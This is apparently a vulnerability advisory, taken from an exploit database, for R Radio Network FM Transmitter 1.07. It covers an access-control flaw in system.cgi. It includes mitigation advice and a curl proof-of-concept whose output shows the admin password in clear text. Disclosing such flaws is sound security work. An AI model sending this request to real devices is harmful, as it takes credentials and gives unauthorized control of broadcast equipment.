R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

vendor:

FM Transmitter

by:

Gjoko 'LiquidWorm' Krstic

6.1

CVSS

HIGH

Password Disclosure

798

CWE

Product Name: FM Transmitter

Affected Version From: 01.07

Affected Version To: 01.07

Patch Exists: NO

Related CWE:

CPE: a:r_radio_network:fm_transmitter:1.07

Metasploit:

Other Scripts:

Platforms Tested: CSBtechDevice

2023

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

The R Radio FM Transmitter 1.07 system.cgi endpoint has an improper access control vulnerability that allows unauthenticated users to access and reveal the clear-text password of the admin user. This disclosure enables attackers to bypass authentication and gain unauthorized access to the FM station setup.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to the system.cgi endpoint, implement proper authentication mechanisms, and ensure that sensitive information such as passwords are not exposed in clear text.

Source

Exploit-DB raw data:

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure


Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07

Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.

Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.

Tested on: CSBtechDevice


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php


09.10.2023

--


$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$